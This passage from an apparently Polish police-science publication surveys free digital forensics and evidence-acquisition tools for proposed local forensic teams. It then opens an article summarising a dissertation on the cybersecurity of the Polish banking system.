cyfrowych nośników informacji. Ma to miejsce w trakcie wykonywanych czynności
procesowych i obejmuje zarówno zabezpieczanie plików jak i całych folderów danych,
czy też kopii logicznych lub binarnych nośników. Istotnym elementem łączącym te
wszystkie formy zabezpieczenia jest zapewnienie dowodom niepodważalności i
integralności. W tym celu wykorzystywane są różnego rodzaju narzędzia wyliczające
funkcje skrótu (tzw. sumy kontrolne). Jednym z prostszych, a dodatkowo dysponujących
dodatkowymi funkcjonalnościami jest archiwizer 7-Zip
10
. Oprócz podstawowych
aktywności związanych z kompresją danych, pozwala on na wyliczanie sum kontrolnych
w kilku popularnych formatach, zarówno dla pojedynczych plików, jak i dla całych
katalogów. Zapewnienie integralności danych niejednokrotnie wymaga także
ograniczenia możliwości ingerencji w metadane, czy też w samą strukturę plików
podczas wykonywania operacji z nimi związanych. W przypadku konieczności
zablokowania możliwości modyfikacji plików na nośnikach zewnętrznych podłączanych
do stanowiska badawczego, warto skorzystać z rozwiązań programowych blokujących
zapis. Sprawdzonym narzędziem jest USB WriteProtector
11
, który pozwala na
modyfikację rejestru komputera z systemem Windows, aby uniemożliwić zapis na
podłączonych do niego nośnikach dowodowych. Rozwiązanie to może w skuteczny
sposób zastąpić dość drogie, sprzętowe blokery zapisu, których przydatność staje się
coraz bardziej ograniczona.
10
https://www.7-zip.org - ostatni dostęp w dniu 11.11.2023 r.
11
https://gaijin.at/ - ostatni dostęp w dniu 20.11.2023 r.
30
Rysunek 1. Widok ekranu aplikacji USB WriteProtector
Pisząc o ograniczonej przydatności blokerów, należy zwrócić uwagę na
zwiększającą się liczbę nośników wlutowywanych w płytę główną komputera. I nie jest
to tylko domena firmy z Cupertino, ale coraz powszechniejsze zjawisko w wyższej klasy
laptopach. W takich wypadkach bloker sprzętowy staje się bezużyteczny. Odpowiedzią
na tego rodzaju problemy są różnego rodzaju dystrybucje „live forensics” systemu Linux,
przy czym na potrzeby organów ścigania zdecydowanie godną polecenia jest,
nierozwijana już, wersja o nazwie DEFT Zero 2018.2
12
, która została ograniczona do
najpotrzebniejszych narzędzi umożliwiających wykonanie kopii binarnych nośników i
ich wstępną analizę. System ten może być uruchamiany zarówno na komputerach
dowodowych, jak i funkcjonować jako niezależne stanowisko do akwizycji danych oraz
bezpiecznego przeglądania zawartości nośników dowodowych bez obaw o ich
modyfikację. Gdyby porównywać to rozwiązanie do dostępnych dla systemu Windows,
to zdecydowanie najbliżej mu do aplikacji FTK Imager
13
firmy Exterro, Inc. Jest to
wielofunkcyjne narzędzie, dostępne po zarejestrowaniu na stronie producenta, które
pozwala na wykonywanie obrazów (kopii kryminalistycznych) zarówno nośników
fizycznych jak i wybranych zasobów logicznych oraz pamięci RAM komputerów.
Ponadto umożliwia wyliczenie funkcji skrótu dla zabezpieczanych zasobów w formacie
MD-5 jak i SHA-1, jak i wygenerowanie struktury plików i katalogów na nośniku do
odrębnego pliku tekstowego. Przydatną funkcjonalnością jest możliwość podmontowania
obrazów dysków i wstępnego przejrzenia ich zawartości.
12
https://archiveos.org/deft/ - ostatni dostęp w dniu 11.11.2023 r.
13
https://www.exterro.com/ftk-imager - ostatni dostęp w dniu 11.11.2023 r.
31
Rysunek 2. FTK Imager z podmontowanym obrazem dysku.
Oba powyższe rozwiązania pozwalają na skuteczną akwizycję części
dostępnych cyfrowych nośników danych, takich jak dyski twarde, karty pamięci,
pendrive czy nośniki optyczne. Problem pojawia się, kiedy należy zabezpieczyć dane z
urządzeń mobilnych. Rozwiązania wielofunkcyjne, pozwalające zarówno na akwizycję
jak i analizę danych zostaną omówione w dalszej części niniejszego opracowania,
natomiast w tym miejscu zaprezentowane zostanie rozwiązanie pozwalające na akwizycję
danych także z urządzeń mobilnych. Jest to aplikacja Magnet Aquire
14
, która pozwala na
zabezpieczanie danych z urządzeń mobilnych z systemem Android jak i iOS, przy czym
z części urządzeń mobilnych możliwe jest zabezpieczenie nie tylko danych w
ograniczonym zakresie w postaci tzw. odczytu logicznego, ale także pełnej kopii
fizycznej pamięci urządzenia. Co ciekawe, firma Magnet Forensics jest znana bardziej z
rozwiązań komercyjnych wspierających pracę między innymi organów ścigania, takich
jak Magnet Axiom czy Magnet Axiom Cyber, ale w swoim portfolio posiada bardzo wiele
rozwiązań darmowych, pozwalających na zabezpieczanie danych istotnych z punktu
widzenia informatyka śledczego, do których powrócimy w dalszej części niniejszego
opracowania.
14
https://www.magnetforensics.com/resources/magnet-acquire/ - ostatni dostęp w dniu 16.11.2023 r.
32
Rysunek 3. Magnet Aquire - ekran wyboru nośnika do akwizycji.
Mając wykonane uwierzytelnione kopie plików, katalogów czy całych
nośników, warto dysponować narzędziami umożliwiającymi ich kompleksową analizę.
Do dyspozycji tworzonych zespołów wsparcia pozostają zarówno całe środowiska
dedykowane na potrzeby informatyki śledczej jak i specjalistyczne narzędzia,
wyodrębniające i katalogujące dane na potrzeby dalszej analizy. Jako przykład
środowiska przygotowanego specjalnie na potrzeby informatyki śledczej wskazać można
dystrybucję CSI Linux
15
. Jest to dedykowana platforma oparta na popularnym Ubuntu
Linux, zawierająca szereg narzędzi przydatnych w informatyce śledczej, białym
wywiadzie oraz szeroko rozumianym cyberbezpieczeństwie. Oprócz zebrania w jednym
miejscu wielu przydatnych narzędzi, dysponuje ona elementami wyróżniającymi ją
spośród innych tego typu rozwiązań, a mianowicie modułem zarządzania sprawami i
raportowania, wyposażonymi w wiele przydatnych wzorów. W chwili obecnej są one
dostępne wyłącznie w języku angielskim, ale ich przetłumaczenie i dopasowanie do
obowiązującego w Polsce systemu prawnego nie powinno stanowić większych
problemów. CSI Linux może zostać zainstalowany jako pełnoprawny system operacyjny,
lub być wykorzystywane jako maszyna wirtualna
16
. System można także zainstalować na
przenośnym nośniku w celu wykorzystania w trakcie badań przeprowadzanych metodą
„triage” dysku twardego komputera, na którym uruchomiony został CSI Linux zamiast
systemu natywnego.
15
https://csilinux.com - ostatni dostęp w dniu 11.11.2023 r.
16
Na przykład uruchamiana przy wykorzystaniu aplikacji Oracle VirtualBox - https://www.virtualbox.org/ -
ostatni dostęp w dniu 20.11.2023 r.
33
Rysunek 4. CSI Linux - panel zarządzania sprawami.
Niezależnie od dedykowanych systemów operacyjnych
wykorzystywanych w ramach informatyki śledczej, dostępne są także darmowe
rozwiązania nie będące kompletnymi ekosystemami, lecz rozbudowanymi platformami
analityczno-badawczymi. Jednym z najpopularniejszych rozwiązań dostępnych na
licencji Open Source dla systemów z rodziny Linux, MacOS i Windows, jest niewątpliwie
Autopsy
17
. Oprogramowanie to pozwala między innymi na prowadzenie kompleksowych
analiz zarówno komputerowych dysków twardych, jak i danych zabezpieczonych z
urządzeń mobilnych z systemami operacyjnymi iOS czy też Android, a także informacji
pozyskanych np. z niektórych modeli dronów. Samo rozwiązanie jest bardzo elastyczne,
i umożliwia tworzenie dodatków wspierających pracę podstawowych modułów programu
zarówno w języku java jak i python. Niezależnie od powyższego, w serwisie GitHub
18
dostępny jest całkiem pokaźny zbiór dodatków przygotowanych przez społeczność
Autopsy. Powyższe cechy powodują, iż przedmiotowe rozwiązanie stanowić może realną
alternatywę dla rozwiązań komercyjnych. Nadto należy zauważyć, iż twórcy
oprogramowania przygotowali dodatkowe wsparcie dla organów ścigania w postaci
modułu integrującego Autopsy z danymi pozyskiwanymi z Project VIC, co umożliwia
automatyczną identyfikację znanych plików graficznych zawierających treści związane z
seksualnym wykorzystaniem małoletnich (Child Sexual Abuse Material - CSAM) w
badanych zbiorach danych. Takie rozwiązanie w znaczący sposób przyspiesza analizę
zabezpieczonych w toku postępowania przygotowawczego cyfrowych nośników
informacji i pozwala na uzyskanie materiału dowodowego bezpośrednio przez
specjalistów ZISAB na poziomie komendy miejskiej czy też powiatowej Policji, bez
konieczności angażowania biegłych sądowych czy laboratorium kryminalistycznego.
17
https://www.autopsy.com - ostatni dostęp w dniu 11.11.2023 r.
18
https://github.com/sleuthkit/autopsy_addon_modules - ostatni dostęp w dniu 11.11.2023 r.
34
Rysunek 5. Autopsy - moduł analizy danych.
Rozwiązaniem zbliżonym swoją funkcjonalnością do omówionego
powyżej Autopsy jest IPED
19
. Pełna nazwa aplikacji to Indexador e Processador de
Evidências Digitais, co można przetłumaczyć z języka portugalskiego jako Indeksator i
Procesor Dowodów Cyfrowych. Aplikacja może być uruchamiana na komputerach
pracujących pod kontrolą systemów Linux i Windows. Podobnie jak w przypadku
poprzednio omawianej aplikacji, jej podstawowe funkcjonalności mogą być rozszerzane
poprzez zestawy dodatków. Dostępne rozszerzenia pozwalają między innymi na analizę
sygnatur plików i ich kategoryzację, geoferencję danych GPS przy wykorzystaniu Map
Google, Bing czy OpenStreetMaps, przeszukiwanie plików pod kątem wystąpienia słów
kluczowych, lub przy pomocy wyrażeń regularnych, porównywanie plików tekstowych
lub plików wideo i wiele innych. Ciekawą i niewątpliwie przydatną funkcjonalnością jest
możliwość przygotowania analizy graficznej dla ujawnionej komunikacji. Aplikacja ta
jest bardzo popularna wśród funkcjonariuszy organów ścigania w krajach Ameryki
Południowej. Z całą pewnością należy stwierdzić, iż wykorzystywana wraz z
omówionym wcześniej narzędziem Autopsy, pozwalałaby na wsparcie praktycznie
wszystkich rodzajów postepowań prowadzonych na poziomie jednostek terenowych, w
których zachodzi konieczność przeprowadzenia wstępnych badań i analizy dowodów
cyfrowych.
19
https://github.com/sepinf-inc/IPED - ostatni dostęp w dniu 14.11.2023 r.
35
Rysunek 6. IPED – moduł kategoryzacji danych.
Rysunek 7. IPED – moduł analizy danych.
Kolejnym rozwiązaniem dystrybuowanym na licencji Open Source, które
pochodzi z Brazylii, jest narzędzie do analizy urządzeń mobilnych Avilla Forensics
20
. Za
nie wymagające udowodnienia należy uznać twierdzenie, iż rozwiązania do akwizycji
danych i analizy urządzeń mobilnych, stanowią zdecydowanie najbardziej kosztowny
element wyposażenia laboratorium informatyki śledczej. W przypadku Avilla Forensics
mamy do czynienia z rozwiązaniem całkowicie darmowym, nie obciążającym w żaden
sposób budżetu organów ścigania i o dość dużych możliwościach. Cechy te powodują, iż
20
https://github.com/AvillaDaniel/AvillaForensics - ostatni dostęp w dniu 15.11.2023 r.
36
program doskonale wpisuje się w potrzeby zespołów informatyki śledczej, które nie
uzurpują sobie prawa do bycia pełnoprawnymi laboratoriami, a jednocześnie mogą, w
bardzo wielu przypadkach, skutecznie zabezpieczać i analizować dane z urządzeń
mobilnych. Jako potencjalne ograniczenie wykorzystania aplikacji należy wskazać
możliwość pozyskiwania danych tylko z urządzeń pracujących pod kontrolą systemu
Android lub iOS. Z drugiej strony, rynek urządzeń mobilnych został praktycznie
zdominowany przez te dwa systemy operacyjne, stąd do odczytu danych w większości
przypadków będzie ona wystarczająca. Jeszcze raz przy tej okazji należy przypomnieć,
iż zespoły informatyki śledczej tworzone na poziomie jednostek liniowych w żadnym
wypadku nie mają stanowić konkurencji dla laboratoriów kryminalistycznych czy
specjalistycznych pionów w strukturach organów ścigania. Narzędzie Avilla Forensics
jest rozwijane na bieżąco i wyposażane w coraz nowsze funkcjonalności zarówno w
zakresie akwizycji danych jak i samej ich analizy.
Rysunek 8. Avilla Forensics - ekstrakcja danych z Apple iPhone.
Kolejną grupą narzędzi, która zostanie omówiona w ramach niniejszej
publikacji są programy wspierające analizę live forensics. Przy obecnym stanie
technologii prowadzenie wyłącznie analizy post mortem – na kopiach binarnych
nośników - w większości przypadków pozwoli tylko na zabezpieczenie i
przeanalizowanie jedynie części możliwych do uzyskania informacji. Zabezpieczanie
urządzeń w trakcie pracy pozwala na uzyskanie dodatkowych informacji, takich jak dane
zapisane w pamięci, czy informacje o otwartych portach, zestawionych połączeniach czy
też zalogowanych użytkownikach, które mogą okazać się kluczowymi dla dalszego
przebiegu postępowania przygotowawczego. Należy także pamiętać, iż niezależnie od
postępu technologicznego, systematycznie wzrasta wiedza na temat działań
antykryminalistycznych wśród przestępców, co powoduje, że ich urządzenia są coraz
bardziej profesjonalnie zabezpieczone przed nieuprawnionym dostępem, a co za tym
idzie, odpowiednie planowanie czasu zabezpieczenia dowodów cyfrowych, czy też
przeprowadzenia całości realizacji czynności procesowych, nabiera kluczowego
znaczenia.
37
Do zabezpieczania danych z pracujących urządzeń niezbędne jest
posiadanie nośników, na których zainstalowane będą wykorzystywane narzędzia, przy
czym jako godne polecenia należy wskazać szybkie dyski SSD o odpowiednio dużej
pojemności. Są one zdecydowanie bardziej korzystnym rozwiązaniem, zarówno pod
względem technologicznym jaki i ekonomicznym, niż wszelkiego rodzaju pendrive’y i
karty pamięci, a dostępna na nich przestrzeń jest wystarczająca zarówno do
zainstalowania niezbędnych aplikacji jak i tymczasowego przechowywania
zgromadzonych podczas akwizycji danych.
Przygotowując narzędzia do analizy live forensics należy rozpocząć od
rozwiązań pozwalających na zabezpieczenie pamięci RAM pracującego urządzenia.
Zaproponowane poniżej rozwiązania dostarczane przez Belkasoft (Belkasoft RAM
Capturer
21
) czy Magnet Forensics (DumpIT
22
) są intuicyjne i nieskomplikowane, co jest
niewątpliwie ich ogromnym atutem dla funkcjonariuszy z komórek informatyki śledczej
tworzonych na poziomie jednostek organów ścigania szczebla podstawowego, którzy jak
już wcześniej wielokrotnie wspomniano, nie mają zastępować biegłych czy
funkcjonariuszy z wydziałów specjalistycznych, ale wspierać swoich kolegów i koleżanki
przy typowych czynnościach zabezpieczania danych cyfrowych lub wstępnych badaniach
i analizach. Ich wykorzystanie ogranicza się tak naprawdę do uruchomienia na urządzeniu,
z którego pamięci RAM chcemy wykonać zrzut, oraz ewentualnie wskazaniu lokalizacji,
gdzie tego zrzutu zamierzamy dokonać.
Rysunek 9. Belkasoft Live RAM Capturer - wybór lokalizacji zrzutu pamięci.
W przypadkach, kiedy konieczne jest zabezpieczenie większej ilości
różnego rodzaju danych, można skorzystać z bardziej rozbudowanych narzędzi
dostarczanych także przez wyżej wymienionych producentów oprogramowania.
Zarówno Magnet RESPONSE
23
jak i Belkasoft T
24
oferują w gruncie rzeczy zestaw
podobnych funkcjonalności, wśród których znajdziemy między innymi zabezpieczenie:
• zrzutu pamięci RAM i pliku wymiany;
• danych z wybranych lokalizacji;
• plików wskazanych typów;
21
https://belkasoft.com/ram-capturer - ostatni dostęp w dniu 20.11.2023 r.
22
https://www.magnetforensics.com/resources/magnet-dumpit-for-windows/ - ostatni dostęp w dniu
20.11.2023 r.
23
https://www.magnetforensics.com/resources/magnet-response/ - ostatni dostęp w dniu 20.11.2023 r.
24
https://belkasoft.com/t - ostatni dostęp w dniu 20.11.2023 r.
38
Wykorzystanie tych narzędzi pozwala na sprawne i szybkie zabezpieczenie
kluczowych danych z uruchomionego urządzenia, w celu poddania ich szczegółowej
analizie na dalszym etapie postępowania.
Rysunek 10. Magnet RESPONSE - ekran konfiguracji.
Jeśli z różnych powodów zabezpieczenie danych przy wykorzystaniu
powyższych narzędzi okaże się niewystarczające, wykorzystane mogą być darmowe
rozwiązania dostarczane przez firmę NirSoft
25
. Podmiot ten dostarcza szeregu
niewielkich aplikacji, pozwalających na zabezpieczanie praktycznie wszystkich,
istotnych z punktu analizy live forensics, danych. Narzędzia tego producenta mogą być
pobrane i wykorzystane w zależności od aktualnych potrzeb lub funkcjonować w ramach
jednego pakietu NirLauncher
26
. Pakiet ten może być w bardzo prosty sposób uzupełniony
o aplikacje Sysinternals Suite
27
, co dodatkowo zwiększa jego funkcjonalność.
25
https://www.nirsoft.net/about_nirsoft_freeware.html - ostatni dostęp w dniu 20.11.2023 r.
26
https://launcher.nirsoft.net/downloads/ - ostatni dostęp w dniu 20.11.2023 r.
27
https://learn.microsoft.com/pl-pl/sysinternals/downloads/sysinternals-suite - ostatni dostęp w dniu
20.11.2023 r.
39
Rysunek 11. NirLaucher - menu wyboru narzędzi.
Na zakończenie należy wskazać dwa narzędzia, które nie kwalifikują się
do umieszczenia w żadnej z wcześniej omawianych kategorii, a mogą okazać się
niezbędne w codziennej pracy funkcjonariuszy zespołów informatyki śledczej, analizy i
białego wywiadu. Mowa o rozwiązaniach pozwalających zabezpieczać zawartość stron
internetowych dostępnych w sieci Internet, zarówno poprzez zapis widocznych treści do
formatu graficznego lub dokumentu pdf, jak również poprzez zabezpieczenie kompletnej
strony, w celu późniejszej szczegółowej analizy. W toku prowadzenia postepowań
związanych z różnego rodzaju oszustwami inwestycyjnymi lub phishingiem, kryterium
czasu przy zabezpieczeniu treści wyświetlanej na stronach internetowych, które
niejednokrotnie mają bardzo krótki okres funkcjonowania, jest niezwykle istotne. I nie
zastąpią tych narzędzi wydruki dostarczane przez pokrzywdzonego, których wartość jest
bardzo często wątpliwa dowodowo. Pierwszym z narzędzi z tej grupy, któremu należy
poświęcić kilka zdań jest Magnet Web Page Saver
28
firmy Magnet Forensics. Pozwala on
na zabezpieczenie stron w formacie graficznym png jak również jako dokument pdf z
aktywnymi linkami i zakładkami. Dodatkowo, istnieje możliwość zapisu wszystkich
przechwyconych treści w jednej bazie danych, w celu dalszej analizy, oraz zapisania kopii
plików html przechwytywanych stron jak i przechwytywanie multimediów. Aplikacja ma
możliwość zaimportowania listy adresów url stron, w celu zautomatyzowania procesu
zabezpieczania zawartości. Wszystkie czynności realizowane przez program są
rejestrowane w pliku logu. Potencjalnym ograniczeniem narzędzia jest konieczność
wskazania adresów wszystkich istotnych podstron – program nie zabezpiecza ich w
sposób automatyczny. Do plusów należy zaliczyć automatyczne wyliczanie sum
kontrolnych i generowanie raportu, który może być potem zaprezentowany np. na sali
sądowej. W odmienny sposób funkcjonuje drugie z proponowanych narzędzi -
HTTrack Website Copier
29
. Pozwala ono na pobranie kompletnej zawartości witryny, w
28
https://www.magnetforensics.com/resources/web-page-saver/ - ostatni dostęp w dniu 22.11.2023 r.
29
https://www.httrack.com/page/2/en/ - ostatni dostęp w dniu 22.11.2023 r.
40
tym także treści zabezpieczonych poprzez dane logowania – oczywiście w sytuacji, kiedy
są one znane zabezpieczającemu. Wynikiem pracy programu nie jest raport, a wersja
strony, która może być uruchomiona offline i poddana dalszej analizie.
Rysunek 12. HTTrack Website Copier - wykonywanie kopii strony WWW.
Oczywiście, żadne z proponowanych rozwiązań nie jest idealne – każde ma
swoje wady i zalety, a obu zdarza się pomijanie części znajdujących się na stronie danych,
co wymaga uważnego weryfikowania rodzaju zabezpieczonych informacji. Jednak oba
te narzędzia są dostępne za darmo i mogą znacznie ułatwić zabezpieczanie stron WWW,
szczególnie w sytuacji łącznego z nich korzystania, oraz wsparcia innymi rozwiązaniami
– zarówno procesowymi (żądanie wydania rzeczy - danych) jak i technicznymi – np. w
postaci aplikacji GNU Wget
30
.
Podsumowanie
Podsumowując, hipotetyczna budowa zespołów informatyki śledczej, analizy i
białego wywiadu, w oparciu o przedstawione powyżej propozycje mogłaby wyglądać jak
na poniższym schemacie:
30
https://www.gnu.org/software/wget/ - ostatni dostęp w dniu 22.11.2023 r.
41
Rysunek 13. Podsumowanie propozycji ZISAB.
Oczywiście, niniejsze opracowanie należy traktować jako punkt wyjścia do
dalszych, szczegółowych rozważań dotyczących utworzenia w jednostkach liniowych, w
strukturach techniki kryminalistycznej, zespołów informatyki śledczej, analizy i białego
wywiadu, które stanowiłyby istotne wsparcie dla funkcjonariuszy pionu kryminalnego i
zwalczającego przestępczość gospodarczą w zakresie zabezpieczania i wstępnej analizy
danych cyfrowych. Zaproponowane w publikacji rozwiązania, w szczególności
omówione w bardzo ogólny sposób narzędzia, mają charakter jedynie kierunkowy a
twórcze rozwinięcie koncepcji oraz dopasowanie jej do istniejących potrzeb, powinno
zostać poparte szczegółowym badaniem zapotrzebowania w jednostkach, do których
oferta ta miałaby być skierowana.
42
Bibliografia
1. Ustawa z dnia 6 kwietnia 1990 r. o Policji, t.j. Dz. U. z 2023 r. poz. 171 z późn.
zm.
2. Cory Altheide, Harlan Carvey, Informatyka śledcza. Przewodnik po narzędziach
open source, Helion 2014.
3. Piotr Lewulis, Dowody cyfrowe – teoria i praktyka kryminalistyczna w polskim
postępowaniu karnym, Wydawnictwa Uniwersytetu Warszawskiego 2021.
4. Jeremy Martin, CSI Linux: Investigator's Starting Guide, 2023.
5. Bruce Nikkel, Practical Linux Forensics: A Guide for Digital Investigators, No
Starch Press 2021.
6. William Oettinger, Informatyka śledcza. Gromadzenie, analiza i zabezpieczanie
dowodów elektronicznych dla początkujących. Wydanie II, Helion 2023.
43
REVIEW OF RESEARCH RESULTS ON CYBERSECURITY OF THE POLISH
BANKING SYSTEM
PRZEGLĄD WYNIKÓW BADAŃ DOTYCZĄCYCH CYBERBEZPIECZEŃSTWA
POLSKIEGO SYSTEMU BANKOWEGO
Dr Paweł WAWRZYNIAK
1
Wyższa Szkoła Administracji i Biznesu im. E. Kwiatkowskiego w Gdyni
Summary
Banks, which provide countries with the capital to achieve strategic goals in the political,
social, military, and economic dimensions, are a guarantee of the stability of the financial
system. The financial stability of the state, in turn, has an impact on political stability, and
this makes the Polish banking system the target of attacks carried out by entities that are
sources of cyberthreats (cyberthreat actors). An extensive analysis of the available
literature, Internet resources and research conducted with the use of a survey and expert
interviews allowed to: indicate the links between the Polish banking system and the
security of the Republic of Poland, including the area of cybersecurity; analyse
cyberthreats related to the banking system and their impact on the security of the Republic
of Poland in the context of digital transformation; present a range of possible motivations
of cyberthreat actors, including state and non-state actors; outline attribution issues;
identify the possible consequences of attacks, including national, regional and global
socio-economic impacts; determine the directions of actions to be taken to increase the
cybersecurity of banks.
Keywords: cybersecurity, cybercrime, security, banking system, financial system, bank,
financial institution, digital transformation, critical infrastructure, strategy, threat,
cyberthreat actors, cyberattack, risk, attribution.
Introduction The issues related to the importance of the financial system for the security
of the Republic of Poland are seldomly raised. It is much easier to find studies
emphasising the importance of the energy supply, energy raw materials and fuels
distribution, communication, or ICT networks systems. This also applies to research in
cybersecurity. Meanwhile, offensive actions in cyberspace directed against critical
infrastructure, and thus also against some banks, perfectly fit into the arsenal of means of
1
Manager and architect of ICT solutions for almost 20 years working in the financial sector, currently project
manager in one of the largest defence companies in Europe; lecturer at the University of Business and
Administration (UBA) in Gdynia. On November 22, 2022, he defended his doctoral dissertation entitled
“Cybersecurity of the Banking System as an Important Element of the Security of the Republic of Poland”,
prepared under the supervision of Jerzy Kosiński, PhD, DSc. On November 25, 2022, by decision of the
Security Science Discipline Council of the Federation of Military Universities (FMU) in Poland, he was
awarded a doctoral degree in the discipline of security science. Email address: p.wawrzyniak@kadra.wsaib.pl.
ORCID: https://orcid.org/0009-0005-5261-7293.
44
influence used in hybrid warfare
2
. It should be underlined that the stability of the financial
system is guaranteed by banks, which provide countries with capital that allows them to
achieve strategic goals – in the political, social, military, and economic dimensions – and
the progressing digitalisation opens completely new areas of risk. Therefore, it seems that
it is worth considering the issues of cybersecurity of the banking system as an important
element of the security of the Republic of Poland, particularly that this subject seems to
be very topical.
Awareness of the situation described above was the justification for
undertaking the research effort, which was expressed in the doctoral dissertation entitled
“Cybersecurity of the Banking System as an Important Element of the Security of the
Republic of Poland” (Polish original: „Cyberbezpieczeństwo systemu bankowego jako
istotnego elementu bezpieczeństwa Rzeczypospolitej Polskiej”), prepared by the author
under the supervision of Jerzy Kosiński, PhD, DSc, and defended on November 22, 2022
in the Federation of Military Universities (FMU) in Poland
3
. This article presents
methodological assumptions, the subject and purpose of research, the main research
problem and detailed problems, utilised methods and tools, as well as selected results in
synthetic terms, including the main conclusions.
Methodological Assumptions
The title of the dissertation – “Cybersecurity of the Banking System as an
Important Element of the Security of the Republic of Poland” – defines the area of
scientific considerations and indicates that the subject of research were issues
characterising and binding the cybersecurity of the banking system with the security of
the Republic of Poland.
The previously presented area of scientific considerations and the subject
of research were expressed through the following objective: “Analysis of cyberthreats
related to the banking system and their impact on the security of the Republic of Poland
in the context of digital transformation. Identifying possible motivations of entities that
are sources of cyberthreats (cyberthreat actors), outlining attribution issues, determining
the possible effects of attacks, and indicating directions of action to increase the
cybersecurity of banks”.
The main research problem of the dissertation was presented in the form of
the question: “What is the impact of cybersecurity of the banking system on the security
of the Republic of Poland?”. The main research problem was decomposed into four
specific problems:
1. Which elements of the banking system are important from the point of view of
the security of the Republic of Poland?
2. How are contemporary threats to banking systems shaped and which threats
should be considered the most significant?
3. What is the impact of digital transformation on cybersecurity and cybercrime in
relation to banking systems?
4. What could be the impact of cyberattacks on the banking system and what
2
More on hybrid warfare: Hybrid war – hybrid response?,
https://www.nato.int/docu/review/pl/articles/2014/07/01/hybrydowa-wojna-hybrydowa-reakcja/index.html,
[access: 29.08.2023].
3
Federation of Military Universities (FMU) in Poland – website address:
https://www.faw.edu.pl/index.php/en/
45
actions should be taken in the fields of strategy, regulation, cooperation, and
other areas to increase the level of cybersecurity of banks?
The following methods were used in the research process:
1) The method of analysis and criticism of literature (sources) – an extensive
analysis of available literature (books, articles, reports, etc.) and Internet
resources became the foundation for preparing the content of individual
chapters, designing a diagnostic survey, and conducting expert interviews.
2) The method of analysing individual cases – primarily in relation to real situations
and security incidents related to banking systems, which was one of the
foundations for in-depth expert interviews.
3) The method of examining documents – in relation to documents constituting the
basis for operation or created in institutions related to the Polish banking system
(e.g. ZBP’s letter of 29 September 2020 to the Minister of Digital Affairs –
regarding comments to the draft act amending the act on the national
cybersecurity system and the act – public procurement law
4
).
4) The diagnostic survey method – in the scope of research on cybersecurity aspects
of the Polish banking system from the perspective of the security of the Republic
of Poland (research survey and expert interviews).
The diagnostic survey was conducted using the following research tools:
1) survey questionnaire – 134 respondents took part in the research survey. The
survey was addressed to people associated with the Polish banking system –
primarily to employees of IT departments responsible for cybersecurity of banks,
as well as to people professionally dealing with this subject;
2) in-depth (structured) expert interview questionnaire – a request for an expert
interview was sent to: persons who performed expert and advisory functions in
the field of cybersecurity towards institutions of the Polish banking system;
persons who have experience in combating banking cybercrime gained from law
enforcement agencies (secret services and police); persons who have experience
in intelligence and analytical work in the field of security; people who were
employed in the IT departments of banks and worked in the area of
cybersecurity, ICT solutions architecture and risk management; as well as to
academics actively interested in issues related to banking cybersecurity, banking
cybercrime and digital transformation of banks. Out of more than 20 selected
people, 12 experts were qualified for the study, who agreed to be interviewed
and use the collected answers for the purposes of the trial.
It is worth noting that observation (or observational method), which can be
considered a research method only if certain criteria are met, was used to a limited extent.
First, it must be a systematic activity, carried out deliberately in such a way as not to affect
the subject, process, phenomenon and object of observation
5
. In addition, in the case of
participatory observation, it is required to keep an observation diary, and in the case of
external observation, documentation in the form of observation sheets is required.
4
Letter of ZBP dated 29 September 2020 to the Minister of Digital Affairs,
https://mc.bip.gov.pl/fobjects/download/863075/uwagi-zbp-pdf.html, [access: 29.08.2023].
5
J. Apanowicz, Metodologia ogólna, Gdynia 2002, p. 63.
46
The decision to limit the use of the observation method was caused by
several circumstances, i.e. the need to obtain formal consent from each financial
institution that would become the subject of research, including determining the scope
and form of systematic observation, as well as rules of verification, approval,
consolidation, further processing and publication of results under approval of such
institutions
6
. For this reason, a decision was made to generalise all observations to the
level of the Polish banking system, and not to its specific institutions. In addition, issues
with a significant impact on the course of research were considered, such as:
− concern for the objectivity of research – observation must be objective, and so –
as Jerzy Apanowicz stated – it must “effectively counteract subjective and even
objective limitations”
7
;
− the need to meet information security criteria according to the standards used in
financial institutions;
− the obligation to maintain banking secrecy (Article 104.1 of the Act of 29 August
1997 – Banking Law).
8
Bearing in mind the above justification, it must be admitted that during the
study, many phenomena and processes related to the research area and the subject of the
dissertation were observed daily – however, these were not systematic observations in the
sense of the scientific method, they were not documented in the form of an observation
diary and were subject to certain restrictions.
Results
In the course of the research basic terms, important institutions of the Polish
banking system, its shape and relations with the regional (European Union) and
international banking system were defined and presented. This was done through the
analysis of selected, most relevant regulatory and strategic documents. In this way, a
structural model of the banking system in Poland was created – see Figure 1.
It should be emphasised that banks operate in the area of increased risk,
involving the savings of many entities. The historical experience of numerous crises of
banking systems has meant that their functioning is currently regulated and supervised by
the state
9
. The basic act regulating the functioning of the banking sector in any legal
system is the Banking Law. The main purpose of this law is to provide greater security
for the deposits of bank customers
10
. In Poland, such a legal act is the Act of 29 August
1997 – Banking Law
11
.
However, the development of the structural model required recourse to a
number of other regulations (see Figure 1), and in order to demonstrate the strategic
importance of the Polish banking system for the security of the Republic of Poland,
including the area of cybersecurity, the analytical work included, e.g. “National Security
6
There was a risk related to possible attempts by the examined financial institutions to influence the scope of
the collected material, the research process and the research results.
7
J. Apanowicz, Metodologia…, op. cit., s. 63.
8
Act of 29 August 1997 – Banking Law, Journal of Laws of 1997, No. 140, item 939.
9
B. Kosiński, A. Z. Nowak, R. Karkowska, T. Winkler-Drews, Podstawy współczesnej bankowości,
Warszawa 2017, p. 22.
10
Ibidem.
11
Act of 29 August 1997 – Banking Law, Journal of Laws of 1997, No. 140, item 939.
47
Strategy of the Republic of Poland 2020”
12
, “Cybersecurity Strategy of the Republic of
Poland for 2019-2024”
13
, the Act of 5 July 2018 on the National Cybersecurity System
14
and the Act of 26 April 2007 on Crisis Management
15
.
Subsequently, an evolutionary look at the development of banking and the
area of its threats was presented. Reflections on this subject began with the presentation
of classic (traditional) banking, based on direct contact with the customer carried out
through an extensive network of branches. The next stage of banking development, which
has been discussed, was electronic banking – providing customers with the possibility of
remote contact with the bank, ranging from ATMs, through telephone contact, to online
banking. The analysis of the available research material was aimed, e.g. at determining
the nature of digital banking – the currently promoted model based on strong competition,
innovation, the use of modern technologies, putting the customer in the centre of the
bank’s interest, and even anticipating its market needs. In evolutionary terms, an analysis
of threats to banking systems – operating in the national (e.g. Polish banking system),
regional (e.g. the banking system of the European Union) and international (global
banking system) dimensions – was also presented.
The research material was provided here, e.g., by the report published in
November 2021 entitled “Security Environment of Electronic Banking Customers”
16
,
which was developed at the request of the Analytical and Research Program of the
Warsaw Institute of Banking Foundation by the team of the Maritime Cybersecurity
Centre of the Polish Naval Academy (MCC AMW) under the leadership of Jerzy Kosiński,
